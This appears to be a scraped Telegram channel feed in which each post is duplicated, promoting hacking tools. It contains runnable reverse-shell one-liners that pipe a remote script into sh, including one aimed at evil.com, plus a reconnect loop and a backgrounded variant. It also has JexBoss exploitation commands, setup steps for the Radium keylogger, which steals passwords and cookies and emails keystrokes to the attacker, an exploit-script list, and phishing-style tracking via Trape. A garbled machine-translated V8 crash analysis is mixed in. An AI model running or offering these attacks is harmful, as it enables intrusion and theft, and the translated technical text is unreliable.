Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Windows Exploit Suggeste
> list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported
> twitter.com/Undercodenews
π¦πβπππΈπππππΈπππβ & βπβ:
1) On your linux
> git clone https://github.com/bitsadmin/wesng#windows-exploit-suggester---next-generation-wes-ng
2) go dir
> Obtain the latest database of vulnerabilities by executing the command wes.py --update.
3) Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt
4) Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available.
5) As the data provided by Microsoft's MSRC feed is frequently incomplete and false positives are reported by wes.py,
6) Additionally, make sure to check the Eliminating false positives page at the Wiki on how to interpret the results. For an overview of all available parameters, check CMDLINE.md.
# top 2020
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Windows Exploit Suggeste
> list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported
> twitter.com/Undercodenews
π¦πβπππΈπππππΈπππβ & βπβ:
1) On your linux
> git clone https://github.com/bitsadmin/wesng#windows-exploit-suggester---next-generation-wes-ng
2) go dir
> Obtain the latest database of vulnerabilities by executing the command wes.py --update.
3) Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt
4) Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available.
5) As the data provided by Microsoft's MSRC feed is frequently incomplete and false positives are reported by wes.py,
6) Additionally, make sure to check the Eliminating false positives page at the Wiki on how to interpret the results. For an overview of all available parameters, check CMDLINE.md.
# top 2020
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE TESTING NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE TESTING NEWS (@UndercodeNews). EXPERT HACKING | SECURITY | TRAINING & MUCH MORE ...@UndercodeNews @DailyCVE. Lebanon-North
Forwarded from PRIVATE UNDERCODE
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦UPDATED Advanced vulnerability scanning with Nmap NSE
> Vulscan is a module which enhances nmap to a vulnerability scanner. The nmap option -sV enables version detection per service which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB.
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) install the files into the following folder of your Nmap installation:
Nmap\scripts\vulscan\*
2) Clone the GitHub repository like this:
git clone https://github.com/scipag/vulscan scipag_vulscan
3) ln -s
4) nmap -sV --script=vulscan/vulscan.nse www.example.com
π¦Single Database Mode
You may execute vulscan with the following argument to use a single database:
--script-args vulscandb=your_own_database
It is also possible to create and reference your own databases. This requires to create a database file, which has the following structure:
<id>;<title>
> Just execute vulscan like you would by refering to one of the pre-delivered databases. Feel free to share your own database and vulnerability connection with me, to add it to the official repository.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦UPDATED Advanced vulnerability scanning with Nmap NSE
> Vulscan is a module which enhances nmap to a vulnerability scanner. The nmap option -sV enables version detection per service which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB.
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) install the files into the following folder of your Nmap installation:
Nmap\scripts\vulscan\*
2) Clone the GitHub repository like this:
git clone https://github.com/scipag/vulscan scipag_vulscan
3) ln -s
pwd/scipag_vulscan /usr/share/nmap/scripts/vulscan 4) nmap -sV --script=vulscan/vulscan.nse www.example.com
π¦Single Database Mode
You may execute vulscan with the following argument to use a single database:
--script-args vulscandb=your_own_database
It is also possible to create and reference your own databases. This requires to create a database file, which has the following structure:
<id>;<title>
> Just execute vulscan like you would by refering to one of the pre-delivered databases. Feel free to share your own database and vulnerability connection with me, to add it to the official repository.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
π¦Vulnerability Database
There are the following pre-installed databases available at the moment:
> scipvuldb.csv - https://vuldb.com
> cve.csv - https://cve.mitre.org
> securityfocus.csv - https://www.securityfocus.com/bid/
> xforce.csv - https://exchange.xforce.ibmcloud.com/
> expliotdb.csv - https://www.exploit-db.com
> openvas.csv - http://www.openvas.org
> securitytracker.csv - https://www.securitytracker.com (end-of-life)
> osvdb.csv - http://www.osvdb.org (end-of-life)
There are the following pre-installed databases available at the moment:
> scipvuldb.csv - https://vuldb.com
> cve.csv - https://cve.mitre.org
> securityfocus.csv - https://www.securityfocus.com/bid/
> xforce.csv - https://exchange.xforce.ibmcloud.com/
> expliotdb.csv - https://www.exploit-db.com
> openvas.csv - http://www.openvas.org
> securitytracker.csv - https://www.securitytracker.com (end-of-life)
> osvdb.csv - http://www.osvdb.org (end-of-life)
Vuldb
Vulnerability Database π‘
Number one vulnerability management and threat intelligence platform documenting and explaining vulnerabilities since 1970.
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Java Deserialization Vulnerabilities) verify and EXploitation Tool
> topic tools :
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications..
twitter.com/UndercOdeTC
π¦πβπππΈπππππΈπππβ & βπβ:
A) Installation on Linux\Mac
To install the latest version of JexBoss, please use the following commands:
1) git clone https://github.com/joaomatosf/jexboss.git
2) cd jexboss
3) pip install -r requires.txt
4) python jexboss.py -h
5) python jexboss.py -host http://target_host:8080
OR:
6) Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
7) unzip master.zip
8) cd jexboss-master
9) pip install -r requires.txt
10) python jexboss.py -h
11) python jexboss.py -host http://target_host:8080
> If you are using CentOS with Python 2.6, please install Python2.7.
B) Installation example of the Python 2.7 on CentOS using Collections Software scl:
1) yum -y install centos-release-scl
2) yum -y install python27
3) scl enable python27 bash
π¦Installation on Windows
If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:
1) Download and install Python
2) Download and install Git for Windows
After installing, run the Git for Windows and type the following commands:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
3) > git clone https://github.com/joaomatosf/jexboss.git
4) cd jexboss
5) pip install -r requires.txt
6) python jexboss.py -h
7) python jexboss.py -host http://target_host:8080
π¦ The exploitation vectors are:
/admin-console
tested and working in JBoss versions 5 and 6
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6
Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
Servlet Deserialization
tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications
π¦Tested By UndercOde On
> Debian
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Java Deserialization Vulnerabilities) verify and EXploitation Tool
> topic tools :
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications..
twitter.com/UndercOdeTC
π¦πβπππΈπππππΈπππβ & βπβ:
A) Installation on Linux\Mac
To install the latest version of JexBoss, please use the following commands:
1) git clone https://github.com/joaomatosf/jexboss.git
2) cd jexboss
3) pip install -r requires.txt
4) python jexboss.py -h
5) python jexboss.py -host http://target_host:8080
OR:
6) Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
7) unzip master.zip
8) cd jexboss-master
9) pip install -r requires.txt
10) python jexboss.py -h
11) python jexboss.py -host http://target_host:8080
> If you are using CentOS with Python 2.6, please install Python2.7.
B) Installation example of the Python 2.7 on CentOS using Collections Software scl:
1) yum -y install centos-release-scl
2) yum -y install python27
3) scl enable python27 bash
π¦Installation on Windows
If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:
1) Download and install Python
2) Download and install Git for Windows
After installing, run the Git for Windows and type the following commands:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
3) > git clone https://github.com/joaomatosf/jexboss.git
4) cd jexboss
5) pip install -r requires.txt
6) python jexboss.py -h
7) python jexboss.py -host http://target_host:8080
π¦ The exploitation vectors are:
/admin-console
tested and working in JBoss versions 5 and 6
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6
Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
Servlet Deserialization
tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications
π¦Tested By UndercOde On
> Debian
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Reverse Shell as a Service topic updated
>pinterest.com/Undercode_Testing
π¦ ππΌππ πππΈβπ :
> clone https://github.com/lukechilds/reverse-shell
1) Listen for connection
On your machine, open up a port and listen on it. You can do this easily with netcat.
> nc -l 1337
2) Execute reverse shell on target
On the target machine, pipe the output of https://shell.now.sh/yourip:port into sh.
3) curl https://shell.now.sh/192.168.0.69:1337 | sh
4) Go back to your machine, you should now have a shell prompt.
π¦Hostname
> You can use a hostname instead of an IP.
1) curl https://shell.now.sh/localhost:1337 | sh
Remote connections
Because this is a reverse connection it can punch through firewalls and connect to the internet.
2) You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with.
> curl https://shell.now.sh/evil.com:1337 | sh
3) Reconnecting
By default when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.
while true; do curl https://shell.now.sh/yourip:1337 | sh; done
4) Running as a background process
> Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.
sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Reverse Shell as a Service topic updated
>pinterest.com/Undercode_Testing
π¦ ππΌππ πππΈβπ :
> clone https://github.com/lukechilds/reverse-shell
1) Listen for connection
On your machine, open up a port and listen on it. You can do this easily with netcat.
> nc -l 1337
2) Execute reverse shell on target
On the target machine, pipe the output of https://shell.now.sh/yourip:port into sh.
3) curl https://shell.now.sh/192.168.0.69:1337 | sh
4) Go back to your machine, you should now have a shell prompt.
π¦Hostname
> You can use a hostname instead of an IP.
1) curl https://shell.now.sh/localhost:1337 | sh
Remote connections
Because this is a reverse connection it can punch through firewalls and connect to the internet.
2) You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with.
> curl https://shell.now.sh/evil.com:1337 | sh
3) Reconnecting
By default when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.
while true; do curl https://shell.now.sh/yourip:1337 | sh; done
4) Running as a background process
> Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.
sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) on Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Forwarded from PRIVATE UNDERCODE
Your domain is not pointing to our name servers
Therefore most features (website, e-mail, FTP) will not work. You need to navigate to your domain registrar (the company where you registered your domain) and edit DNS details of your domain. Here are new name servers:
ns1.dns-parking.com
ns2.dns-parking.com
This way, you will be able to take full advantage of all our features. Your domain will display the content uploaded to your account, mail service will be active, you will be able to activate SSL, create subdomains and manage your DNS zone. Domain will become fully functional in a few hours. Global DNS servers have to fetch new domain details first.
In the meantime, use this link to preview your website:
dailycve-com.preview-domain.com
This link will be available for 120h after your account is created
Therefore most features (website, e-mail, FTP) will not work. You need to navigate to your domain registrar (the company where you registered your domain) and edit DNS details of your domain. Here are new name servers:
ns1.dns-parking.com
ns2.dns-parking.com
This way, you will be able to take full advantage of all our features. Your domain will display the content uploaded to your account, mail service will be active, you will be able to activate SSL, create subdomains and manage your DNS zone. Domain will become fully functional in a few hours. Global DNS servers have to fetch new domain details first.
In the meantime, use this link to preview your website:
dailycve-com.preview-domain.com
This link will be available for 120h after your account is created
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Microsoft finds Google Chrome vulnerability, Google finds Microsoft Edge vulnerability full by underc0de :
>Security is now a powerful difference in picking the right browser. We all use browsers for everyday activities, such as staying in touch with loved ones, editing sensitive private and corporate documents, and even managing our financial assets. A single compromise through a web browser can have disastrous consequences. This does not mean that the browser is also becoming one of the most sophisticated consumer software available, increasing the potential attack surface.
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Find and exploit remote vulnerabilities
> Usually, we do this by discovering memory corruption errors, such as buffer overflows or post-exempt vulnerabilities.
2) As with any web browser, the attack surface is extensive, including the V8 JavaScript interpreter, the Blink DOM engine, and the ium PDF PDF renderer. For this project, we focused on V8 .
3) The bugs we ultimately used for our exploit were discovered through obfuscation. We use the Azure-based fuzzy infrastructure of the Windows Security Assurance team to run ExprGen , an internal JavaScript fuzzer written by the team behind Chakra (our own JavaScript engine). People may have thrown all public fuzzers on V8 ; on the other hand, ExprGen has only operated on Chakra , giving it more opportunities to lead to new bugs.
π¦ 1) Recognition error
One disadvantage of obfuscation compared to manual code review is that it is not always immediately clear what causes a given test case to trigger a vulnerability, or unexpected behavior even constitutes a vulnerability.
2) This is especially true for us at OSR; we don't have any experience working with V8 , so little is known about its internal work. In this case, the test cases generated by ExprGen reliably crashed V8 , but not always in the same way, and not in a way that could be easily affected by attackers.
3) Since fuzzers often generate very large and complex code (in this case, nearly 1,500 lines of unreadable JavaScript), the first step is usually to minimize test cases β trimming fat until we leave a small, understandable Code. This is underc0de final conclusion:
>looks weird and doesn't really implement anything, but it is valid JavaScript. All it does is create a weird structured object and then set some of its fields. This should not trigger any strange behavior, but it is. When running this code with D8 , the standalone executable version of V8 is built with git tag 6.1.5534.32 and we will experience a crash
> Looking at the address where the crash occurred ( 0x000002d168004f14 ), we can tell it will not happen in a static module. Therefore, it must be code that is dynamically generated by the V8 Just-In-Time (JIT) compiler. We also see the crash because the rax register is zero.
> looks like a classic zero dereference error, which would be a waiver: usually not exploitable because modern operating systems prevent zero virtual addresses from being mapped
+ Check out picture
> our crash happened before a function call and looked like a JavaScript function dispatcher stub, mainly because the address of v8 :: internal :: Builtin_FunctionPrototypeToString was loaded into a register before the call. Looking at the code located at the function 0x000002d167e84500 , we find that the address 0x000002d167e8455f does contain a call to the RBX instruction, which seems to confirm our suspicion.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Microsoft finds Google Chrome vulnerability, Google finds Microsoft Edge vulnerability full by underc0de :
>Security is now a powerful difference in picking the right browser. We all use browsers for everyday activities, such as staying in touch with loved ones, editing sensitive private and corporate documents, and even managing our financial assets. A single compromise through a web browser can have disastrous consequences. This does not mean that the browser is also becoming one of the most sophisticated consumer software available, increasing the potential attack surface.
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Find and exploit remote vulnerabilities
> Usually, we do this by discovering memory corruption errors, such as buffer overflows or post-exempt vulnerabilities.
2) As with any web browser, the attack surface is extensive, including the V8 JavaScript interpreter, the Blink DOM engine, and the ium PDF PDF renderer. For this project, we focused on V8 .
3) The bugs we ultimately used for our exploit were discovered through obfuscation. We use the Azure-based fuzzy infrastructure of the Windows Security Assurance team to run ExprGen , an internal JavaScript fuzzer written by the team behind Chakra (our own JavaScript engine). People may have thrown all public fuzzers on V8 ; on the other hand, ExprGen has only operated on Chakra , giving it more opportunities to lead to new bugs.
π¦ 1) Recognition error
One disadvantage of obfuscation compared to manual code review is that it is not always immediately clear what causes a given test case to trigger a vulnerability, or unexpected behavior even constitutes a vulnerability.
2) This is especially true for us at OSR; we don't have any experience working with V8 , so little is known about its internal work. In this case, the test cases generated by ExprGen reliably crashed V8 , but not always in the same way, and not in a way that could be easily affected by attackers.
3) Since fuzzers often generate very large and complex code (in this case, nearly 1,500 lines of unreadable JavaScript), the first step is usually to minimize test cases β trimming fat until we leave a small, understandable Code. This is underc0de final conclusion:
>looks weird and doesn't really implement anything, but it is valid JavaScript. All it does is create a weird structured object and then set some of its fields. This should not trigger any strange behavior, but it is. When running this code with D8 , the standalone executable version of V8 is built with git tag 6.1.5534.32 and we will experience a crash
> Looking at the address where the crash occurred ( 0x000002d168004f14 ), we can tell it will not happen in a static module. Therefore, it must be code that is dynamically generated by the V8 Just-In-Time (JIT) compiler. We also see the crash because the rax register is zero.
> looks like a classic zero dereference error, which would be a waiver: usually not exploitable because modern operating systems prevent zero virtual addresses from being mapped
+ Check out picture
> our crash happened before a function call and looked like a JavaScript function dispatcher stub, mainly because the address of v8 :: internal :: Builtin_FunctionPrototypeToString was loaded into a register before the call. Looking at the code located at the function 0x000002d167e84500 , we find that the address 0x000002d167e8455f does contain a call to the RBX instruction, which seems to confirm our suspicion.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
4) This does not produce very useful information.
5) We can see that most of these values ββare pointers, but that's about it. However, knowing the location of the value (what does it mean a pointer) is useful because it can help us figure out why this value is zero in the first place. Using WinDbg's new " Time Journey Debugging (TTD)" feature, we can place a memory write breakpoint at this location ( baw 8 0000025e`a6845dd0 ), then place an execution breakpoint at the beginning of the function, and finally Rerun backward tracking ( g- ).
6) Interestingly, our memory write breakpoints are not triggered, which means that this memory slot is not initialized in this function, or at least it will not be used. This may be normal, but if we play with test cases, for example by replacing obbc.bca.bcab = 0; line with obbc.bca.bcab = 0xbadc0de; then we start to notice changes in the memory area where our crash values ββoccur
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
5) We can see that most of these values ββare pointers, but that's about it. However, knowing the location of the value (what does it mean a pointer) is useful because it can help us figure out why this value is zero in the first place. Using WinDbg's new " Time Journey Debugging (TTD)" feature, we can place a memory write breakpoint at this location ( baw 8 0000025e`a6845dd0 ), then place an execution breakpoint at the beginning of the function, and finally Rerun backward tracking ( g- ).
6) Interestingly, our memory write breakpoints are not triggered, which means that this memory slot is not initialized in this function, or at least it will not be used. This may be normal, but if we play with test cases, for example by replacing obbc.bca.bcab = 0; line with obbc.bca.bcab = 0xbadc0de; then we start to notice changes in the memory area where our crash values ββoccur
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ISSUE 2 IN EXPLORET AND CHROME :-Create Crash for browsers :
At this stage of the optimization process, the code looks perfectly reasonable:
1) Allocate a storage block to store the local object obba (node ββ235), and its fields baa and bab are initialized
2) Allocate a memory block to store the local object ob (node ββ259), and its fields are initialized, where ba is initialized with a reference to the previous obba allocation
3) Allocate a storage block to store the local object o (node ββ303), and its fields are initialized
4) Field b of local object o is covered by a reference to object ob (node ββ185)
5) Local object field obba.bab is loaded (nodes 199, 209 and 212)
Call the Object.toString method, passing obba.bab as the first parameter
6) Code compiled in the optimization pipeline at this stage should not appear to exhibit uninitialized local variable behavior, and we assume this is the root cause of the error.
7) Having said that, some aspects of this representation can prove our hypothesis. Looking at nodes 209 and 212 loading obba and obba.bab as function call parameters, we can see that the offsets +24 and +32 correspond to the disassembly of the crash
8) 0x17 and 0x1f are 23 and 31 , respectively . Considering how the value of the V8 tag distinguishes an actual object from an inline integer (SMI), the value of the VORD tag can be applied: if the value intended to indicate that a JavaScript variable has the least significant bit set, it is treated as a pointer to the object, Otherwise it is SMI. Therefore, V8 code is optimized to subtract one from the JavaScript object offset before it is used for dereferencing
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ISSUE 2 IN EXPLORET AND CHROME :-Create Crash for browsers :
At this stage of the optimization process, the code looks perfectly reasonable:
1) Allocate a storage block to store the local object obba (node ββ235), and its fields baa and bab are initialized
2) Allocate a memory block to store the local object ob (node ββ259), and its fields are initialized, where ba is initialized with a reference to the previous obba allocation
3) Allocate a storage block to store the local object o (node ββ303), and its fields are initialized
4) Field b of local object o is covered by a reference to object ob (node ββ185)
5) Local object field obba.bab is loaded (nodes 199, 209 and 212)
Call the Object.toString method, passing obba.bab as the first parameter
6) Code compiled in the optimization pipeline at this stage should not appear to exhibit uninitialized local variable behavior, and we assume this is the root cause of the error.
7) Having said that, some aspects of this representation can prove our hypothesis. Looking at nodes 209 and 212 loading obba and obba.bab as function call parameters, we can see that the offsets +24 and +32 correspond to the disassembly of the crash
8) 0x17 and 0x1f are 23 and 31 , respectively . Considering how the value of the V8 tag distinguishes an actual object from an inline integer (SMI), the value of the VORD tag can be applied: if the value intended to indicate that a JavaScript variable has the least significant bit set, it is treated as a pointer to the object, Otherwise it is SMI. Therefore, V8 code is optimized to subtract one from the JavaScript object offset before it is used for dereferencing
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
π¦Those tutorials- crash browsers bug for developers, or hacker with little bit experience-
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HOW CRASH CODES WORKS IN BROWSERS ?
There are two significant differences:
1) The code no longer has the trouble of loading o , and then ob -it is optimized to directly reference ob , probably because the value of the field has never changed
2) The code no longer initializes obba ; as can be seen in the figure, the turbulence grayscale out of node 264, which means that it no longer lives, so it will not be built into the final code
3) Looking at all active node seems to confirm that this field is no longer initialized. As another sanity check, we run d8 in this test case , using the -no-turbo-escape flag to omit this optimization phase: d8 no longer crashes, confirming that this is the problem.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦HOW CRASH CODES WORKS IN BROWSERS ?
There are two significant differences:
1) The code no longer has the trouble of loading o , and then ob -it is optimized to directly reference ob , probably because the value of the field has never changed
2) The code no longer initializes obba ; as can be seen in the figure, the turbulence grayscale out of node 264, which means that it no longer lives, so it will not be built into the final code
3) Looking at all active node seems to confirm that this field is no longer initialized. As another sanity check, we run d8 in this test case , using the -no-turbo-escape flag to omit this optimization phase: d8 no longer crashes, confirming that this is the problem.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Radium, a keylogger with multiple functions. This tool is written in Python and has many functions as shown below:
twitter.com/undercodenews
π¦ ππΌππ πππΈβπ :
1)Application and keylogger
2) Screenshot record
3) Send keyboard records via email
4) Recover password for Chrome, Mozilla, Filezilla, Core FTP, CyberDuck, FTPNavigator, WinSCP, Outlook, Putty, Skype and more
5) Cookie stealing
6) Automatic update function
7) Collect system information, including internal / external IP addresses, Ipconfig and / all output, and platform version.
π¦ Dependent component
1) PyHook
2) PyWin32
3) MicrosoftVisual C ++ Compiler for Python
4) PyInstaller
π¦ Tool use
1) Download dependent libraries
2) Set Gmail email username and password to minimize Gmail security settings to allow all connections;
3) Set up FTP server, including IP, username and password, and the directory where new version of Radium needs to be stored;
4) Remember to use base64 encoding for passwords;
5) Set the originalfilename variable in copytostartup (), which is the name of the exe file;
6) Use Pyinstaller to make exe files;
7) After recording 300 (modifiable) user keystrokes, a keyboard record is automatically sent to the attacker via email;
8) After recording 500 (modifiable) user keystrokes, screenshots will be taken automatically;
9) Remember, when you convert Radium to exe format, you need to modify the originalfilename and coppiedfilename variables in the copytostartup () function.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Radium, a keylogger with multiple functions. This tool is written in Python and has many functions as shown below:
twitter.com/undercodenews
π¦ ππΌππ πππΈβπ :
1)Application and keylogger
2) Screenshot record
3) Send keyboard records via email
4) Recover password for Chrome, Mozilla, Filezilla, Core FTP, CyberDuck, FTPNavigator, WinSCP, Outlook, Putty, Skype and more
5) Cookie stealing
6) Automatic update function
7) Collect system information, including internal / external IP addresses, Ipconfig and / all output, and platform version.
π¦ Dependent component
1) PyHook
2) PyWin32
3) MicrosoftVisual C ++ Compiler for Python
4) PyInstaller
π¦ Tool use
1) Download dependent libraries
2) Set Gmail email username and password to minimize Gmail security settings to allow all connections;
3) Set up FTP server, including IP, username and password, and the directory where new version of Radium needs to be stored;
4) Remember to use base64 encoding for passwords;
5) Set the originalfilename variable in copytostartup (), which is the name of the exe file;
6) Use Pyinstaller to make exe files;
7) After recording 300 (modifiable) user keystrokes, a keyboard record is automatically sent to the attacker via email;
8) After recording 500 (modifiable) user keystrokes, screenshots will be taken automatically;
9) Remember, when you convert Radium to exe format, you need to modify the originalfilename and coppiedfilename variables in the copytostartup () function.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 small list of useful payloads and bypass for Web Application Security and Pentest/CTF
> pinterest.com/Undercode_TESTING
π¦ ππΌππ πππΈβπ :
1) Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
2) Apache Struts 2 CVE-2017-9805.py
3) Apache Struts 2 CVE-2018-11776.py
4) Docker API RCE.py
5) Drupalgeddon2 CVE-2018-7600.rb
6) Heartbleed CVE-2014-0160.py
7) JBoss CVE-2015-7501.py
8) Jenkins CVE-2015-8103.py
9) Jenkins CVE-2016-0792.py
10) Rails CVE-2019-5420.rb
11) Shellshock CVE-2014-6271.py
12) Tomcat CVE-2017-12617.py
13) WebLogic CVE-2016-3510.py
14) WebLogic CVE-2017-10271.py
15) WebLogic CVE-2018-2894.py
16) WebSphere CVE-2015-7450.py
π¦ https://github.com/swisskyrepo/PayloadsAllTheThings
> checked by Underc0de
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 small list of useful payloads and bypass for Web Application Security and Pentest/CTF
> pinterest.com/Undercode_TESTING
π¦ ππΌππ πππΈβπ :
1) Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
2) Apache Struts 2 CVE-2017-9805.py
3) Apache Struts 2 CVE-2018-11776.py
4) Docker API RCE.py
5) Drupalgeddon2 CVE-2018-7600.rb
6) Heartbleed CVE-2014-0160.py
7) JBoss CVE-2015-7501.py
8) Jenkins CVE-2015-8103.py
9) Jenkins CVE-2016-0792.py
10) Rails CVE-2019-5420.rb
11) Shellshock CVE-2014-6271.py
12) Tomcat CVE-2017-12617.py
13) WebLogic CVE-2016-3510.py
14) WebLogic CVE-2017-10271.py
15) WebLogic CVE-2018-2894.py
16) WebSphere CVE-2015-7450.py
π¦ https://github.com/swisskyrepo/PayloadsAllTheThings
> checked by Underc0de
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) on Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Updated > tracking location script :
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowlege, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
pinterest.com/Undercode_testing
π¦πβπππΈπππππΈπππβ & βπβ
1) git clone https://github.com/jofpin/trape.git
2) cd trape
3) python2 trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt
4) python2 -m pip install -r requirements.txt
π¦ Example of execution
5) Example: python2 trape.py --url http://example.com --port 8080
π¦ HELP AND OPTIONS
6) user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-u URL, --url URL Put the web page url to clone
-p PORT, --port PORT Insert your port
-ak ACCESSKEY, --accesskey ACCESSKEY
Insert your custom key access
-l LOCAL, --local LOCAL
Insert your home file
-n, --ngrok Insert your ngrok Authtoken
-ic INJC, --injectcode INJC
Insert your custom REST API path
-ud UPDATE, --update UPDATE
Update trape to the latest version
--url In this option you add the URL you want to clone, which works as a decoy.
--port Here you insert the port, where you are going to run the trape server.
--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.
--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.
--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.
